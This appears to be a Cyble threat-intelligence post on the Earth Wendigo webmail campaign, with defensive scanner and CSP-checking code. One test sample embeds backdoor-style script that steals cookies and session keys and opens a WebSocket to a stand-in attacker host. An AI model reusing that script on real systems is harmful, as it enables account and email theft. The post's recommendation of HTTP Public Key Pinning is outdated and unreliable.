A newly discovered malware was found to be exfiltrating emails from several organizations in Taiwan, including government organizations, research institutions, and universities. The attackers carried out this operation by injecting a JavaScript backdoor into a widely used Taiwanese webmail system. The threat actor has no known connection with any previously identified attack group. The attack flow of Earth Wendigo is represented in the image below.

Further investigation revealed that the threat actor has also targeted specific individuals with spear-phishing emails in a separate attack campaign. Targeted individuals include politicians and activists who support movements in Tibet, Hong Kong, or the Uyghur region.
Initial Access:
The threat actor follows a series of sophisticated steps to carry out the attack. First, a spear-phishing email carrying obfuscated JavaScript code is sent to the targeted individual. As soon as the victim reads the mail in the webmail client, the JavaScript code contacts a remote server and loads further malicious scripts into the victim's browser.
Behavior and Objectives of the attack:
The scripts are designed to perform malicious actions such as stealing browser cookies and webmail session keys and sending them to the remote server. The malicious scripts are also appended to the victim's email signature so that the infection propagates to their contacts.
The threat actors exploit a cross-site scripting (XSS) vulnerability in the webmail system to inject their malicious JavaScript into the webmail page persistently. The vulnerability in the webmail system was fixed in January 2020, so users running the latest version of the webmail system should not be affected.
Where the XSS vulnerability cannot be exploited, the attackers fall back on a browser feature: by registering their malicious JavaScript as a Service Worker, they can intercept and manipulate HTTPS requests between the client and the server. This Service Worker script can then harvest login credentials.
The malicious code also contains a cookie-stealer script that requests "/cgi-bin/start," a wrapper page in which the webmail session key is embedded. The script then extracts the session key and browser cookies from the response. The image below shows the malicious script used to steal the browser cookies and session key.

Once the attack succeeds, the backdoor can read emails on the server and send their content and attachments to the attacker's WebSocket server. The backdoor also infects other users by appending the malicious JavaScript to the emails the victim sends to contacts who use the same webmail system.
Earth Wendigo was also found to be using multiple malware variants written in Python. The variants communicate with the same domain used in the Wendigo attack. Most of the variants are shellcode loaders for Cobalt Strike. However, it is unclear what additional code they delivered to the victim's system from the attacker's C&C server.
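The behaviours described above (script carried in a signature, Service Worker registration, requests to the "/cgi-bin/start" session wrapper, a WebSocket opened to an outside host) can be triaged in stored signatures and message bodies on the mail server. The scanner below is an added example, not code from the report or from the webmail vendor; the webmail hostname and the HTML samples are constructed assumptions.

```python
import re
from urllib.parse import urlparse

# Assumption: the organisation's own webmail host; any other host is "external".
WEBMAIL_HOST = "webmail.example.org"

SCRIPT_TAG = re.compile(r"<script\b([^>]*)>(.*?)</script>", re.I | re.S)
SRC_ATTR = re.compile(r"""\bsrc\s*=\s*["']([^"']+)""", re.I)
ON_HANDLER = re.compile(r"""\son\w+\s*=\s*["']([^"']*)""", re.I)
# Behaviours the report attributes to the injected JavaScript.
PATTERNS = {
    "service_worker_registration": re.compile(r"navigator\.serviceWorker\.register\s*\("),
    "session_wrapper_request": re.compile(r"/cgi-bin/start"),
    "cookie_access": re.compile(r"document\.cookie"),
}
WEBSOCKET = re.compile(r"""new\s+WebSocket\s*\(\s*["'](wss?://[^"']+)""")

def scan_html(html, webmail_host=WEBMAIL_HOST):
    """Return sorted finding labels for one HTML body or signature (regex triage, not a full parser)."""
    findings = set()
    inline, external = [], []
    for attrs, body in SCRIPT_TAG.findall(html):
        src = SRC_ATTR.search(attrs)
        if src:
            external.append(src.group(1))
        elif body.strip():
            inline.append(body)
    inline += ON_HANDLER.findall(html)          # on* attributes are inline script too
    if inline:
        findings.add("inline_script")            # a signature should never carry script
    if any(urlparse(u).hostname not in (None, webmail_host) for u in external):
        findings.add("external_script_load")
    code = "\n".join(inline)
    findings.update(label for label, rx in PATTERNS.items() if rx.search(code))
    ws = WEBSOCKET.search(code)
    if ws and urlparse(ws.group(1)).hostname != webmail_host:
        findings.add("external_websocket")
    return sorted(findings)

# Constructed samples: a clean signature and one carrying backdoor-style script.
BENIGN = '<p>Regards,<br>Alice</p><img src="https://webmail.example.org/logo.png">'
SUSPECT = ('<p>Regards,<br>Bob</p><script>navigator.serviceWorker.register("/sw.js");'
           'var c = document.cookie; fetch("/cgi-bin/start").then(r => r.text());'
           'new WebSocket("wss://ws.attacker.example/c");</script>')

if __name__ == "__main__":
    for name, sample in (("benign", BENIGN), ("suspect", SUSPECT)):
        print(name, scan_html(sample))
```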
XSS attacks like the one carried out by Earth Wendigo can be mitigated by adopting security measures such as:
- Deploying a Content Security Policy (CSP) for the web application to prevent cross-site scripting, clickjacking, and other code injection attacks.
- Using HTTP Public Key Pinning to prevent attackers from using mis-issued or otherwise fraudulent digital certificates.
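To show what the CSP recommendation above has to cover, the following added example (not code from the report) evaluates a policy against the three behaviours the post describes, applying the CSP3 fallback chains for worker-src and connect-src; the webmail hostname, the policies and the URLs are assumed values.

```python
from urllib.parse import urlparse

FALLBACK = {  # CSP3 fallback chains: the first directive present governs the fetch
    "script-src": ["script-src", "default-src"],
    "worker-src": ["worker-src", "child-src", "script-src", "default-src"],
    "connect-src": ["connect-src", "default-src"],
}

def parse_csp(header):
    """'default-src 'self'; script-src a b' -> {'default-src': ["'self'"], 'script-src': ['a', 'b']}."""
    policy = {}
    for part in header.split(";"):
        tokens = part.split()
        if tokens:
            policy[tokens[0].lower()] = tokens[1:]
    return policy

def effective(policy, directive):
    """Source list governing `directive` after fallbacks, or None if unrestricted."""
    return next((policy[n] for n in FALLBACK[directive] if n in policy), None)

def url_allowed(sources, url, page_host):
    """Simplified source matching: 'self', scheme sources ('https:') and exact hosts."""
    if sources is None:
        return True
    u = urlparse(url)
    for src in sources:
        if src == "*" or (src == "'self'" and u.hostname == page_host):
            return True
        if src.endswith(":") and u.scheme == src[:-1]:
            return True
        if "'" not in src and urlparse("//" + src.split("://")[-1]).hostname == u.hostname:
            return True
    return False

def evaluate(header, page_host, sw_url, ws_url):
    """Which of the three behaviours described in the post does the policy still allow?"""
    p = parse_csp(header)
    script = effective(p, "script-src")
    return {
        # nonce/hash allowances are ignored: an inline <script> injected into a signature is never nonced
        "inline_script": script is None or "'unsafe-inline'" in script,
        "service_worker_registration": url_allowed(effective(p, "worker-src"), sw_url, page_host),
        "external_websocket": url_allowed(effective(p, "connect-src"), ws_url, page_host),
    }

# Constructed policies and URLs for a hypothetical webmail at webmail.example.org.
HOST = "webmail.example.org"
SW, WS = f"https://{HOST}/sw.js", "wss://ws.attacker.example/c"
WEAK = "script-src 'self' 'unsafe-inline'"            # only script-src set; connect-src unrestricted
HARDENED = "default-src 'self'; script-src 'self'; worker-src 'none'; connect-src 'self'"
```

Note that script-src 'self' alone still permits registering a Service Worker served from the webmail's own origin, which is exactly what the XSS-injected script does, so worker-src has to be set explicitly ('none' is only viable if the webmail itself uses no Service Worker).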
Indicators of Compromise (IOCs)
About Cyble
Cyble is a global threat intelligence SaaS provider that helps enterprises protect themselves from cybercrimes and exposure in the darkweb. Cyble’s prime focus is to provide organizations with real-time visibility into their digital risk footprint. Backed by Y Combinator as part of the 2021 winter cohort, Cyble has also been recognized by Forbes as one of the top 20 Best Cybersecurity Startups To Watch In 2020. Headquartered in Alpharetta, Georgia, and with offices in Australia, Singapore, and India, Cyble has a global presence. To learn more about Cyble, visit www.cyble.com.